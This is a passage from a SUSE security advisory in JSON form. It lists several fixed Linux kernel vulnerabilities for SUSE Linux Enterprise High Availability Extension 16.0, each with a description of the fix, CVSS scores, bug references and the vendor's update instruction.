"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37955"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: uartlite: register uart driver in init\n\nWhen two instances of uart devices are probing, a concurrency race can\noccur. If one thread calls uart_register_driver function, which first\nallocates and assigns memory to \u0027uart_state\u0027 member of uart_driver\nstructure, the other instance can bypass uart driver registration and\ncall ulite_assign. This calls uart_add_one_port, which expects the uart\ndriver to be fully initialized. This leads to a kernel panic due to a\nnull pointer dereference:\n\n[ 8.143581] BUG: kernel NULL pointer dereference, address: 00000000000002b8\n[ 8.156982] #PF: supervisor write access in kernel mode\n[ 8.156984] #PF: error_code(0x0002) - not-present page\n[ 8.156986] PGD 0 P4D 0\n...\n[ 8.180668] RIP: 0010:mutex_lock+0x19/0x30\n[ 8.188624] Call Trace:\n[ 8.188629] ? __die_body.cold+0x1a/0x1f\n[ 8.195260] ? page_fault_oops+0x15c/0x290\n[ 8.209183] ? __irq_resolve_mapping+0x47/0x80\n[ 8.209187] ? exc_page_fault+0x64/0x140\n[ 8.209190] ? asm_exc_page_fault+0x22/0x30\n[ 8.209196] ? mutex_lock+0x19/0x30\n[ 8.223116] uart_add_one_port+0x60/0x440\n[ 8.223122] ? proc_tty_register_driver+0x43/0x50\n[ 8.223126] ? tty_register_driver+0x1ca/0x1e0\n[ 8.246250] ulite_probe+0x357/0x4b0 [uartlite]\n\nTo prevent it, move uart driver registration in to init function. This\nwill ensure that uart_driver is always registered when probe function\nis called.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38262",
"url": "https://www.suse.com/security/cve/CVE-2025-38262"
},
{
"category": "external",
"summary": "SUSE Bug 1246282 for CVE-2025-38262",
"url": "https://bugzilla.suse.com/1246282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38262"
},
{
"cve": "CVE-2025-38297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: EM: Fix potential division-by-zero error in em_compute_costs()\n\nWhen the device is of a non-CPU type, table[i].performance won\u0027t be\ninitialized in the previous em_init_performance(), resulting in division\nby zero when calculating costs in em_compute_costs().\n\nSince the \u0027cost\u0027 algorithm is only used for EAS energy efficiency\ncalculations and is currently not utilized by other device drivers, we\nshould add the _is_cpu_device(dev) check to prevent this division-by-zero\nissue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38297",
"url": "https://www.suse.com/security/cve/CVE-2025-38297"
},
{
"category": "external",
"summary": "SUSE Bug 1253078 for CVE-2025-38297",
"url": "https://bugzilla.suse.com/1253078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38297"
},
{
"cve": "CVE-2025-38298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38298"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/skx_common: Fix general protection fault\n\nAfter loading i10nm_edac (which automatically loads skx_edac_common), if\nunload only i10nm_edac, then reload it and perform error injection testing,\na general protection fault may occur:\n\n mce: [Hardware Error]: Machine check events logged\n Oops: general protection fault ...\n ...\n Workqueue: events mce_gen_pool_process\n RIP: 0010:string+0x53/0xe0\n ...\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x37/0x90\n ? exc_general_protection+0x1e7/0x3f0\n ? asm_exc_general_protection+0x26/0x30\n ? string+0x53/0xe0\n vsnprintf+0x23e/0x4c0\n snprintf+0x4d/0x70\n skx_adxl_decode+0x16a/0x330 [skx_edac_common]\n skx_mce_check_error.part.0+0xf8/0x220 [skx_edac_common]\n skx_mce_check_error+0x17/0x20 [skx_edac_common]\n ...\n\nThe issue arose was because the variable \u0027adxl_component_count\u0027 (inside\nskx_edac_common), which counts the ADXL components, was not reset. During\nthe reloading of i10nm_edac, the count was incremented by the actual number\nof ADXL components again, resulting in a count that was double the real\nnumber of ADXL components. This led to an out-of-bounds reference to the\nADXL component array, causing the general protection fault above.\n\nFix this issue by resetting the \u0027adxl_component_count\u0027 in adxl_put(),\nwhich is called during the unloading of {skx,i10nm}_edac.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38298",
"url": "https://www.suse.com/security/cve/CVE-2025-38298"
},
{
"category": "external",
"summary": "SUSE Bug 1253079 for CVE-2025-38298",
"url": "https://bugzilla.suse.com/1253079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-38298"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd9375: Fix double free of regulator supplies\n\nDriver gets regulator supplies in probe path with\ndevm_regulator_bulk_get(), so should not call regulator_bulk_free() in\nerror and remove paths to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38423",
"url": "https://www.suse.com/security/cve/CVE-2025-38423"
},
{
"category": "external",
"summary": "SUSE Bug 1247292 for CVE-2025-38423",
"url": "https://bugzilla.suse.com/1247292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
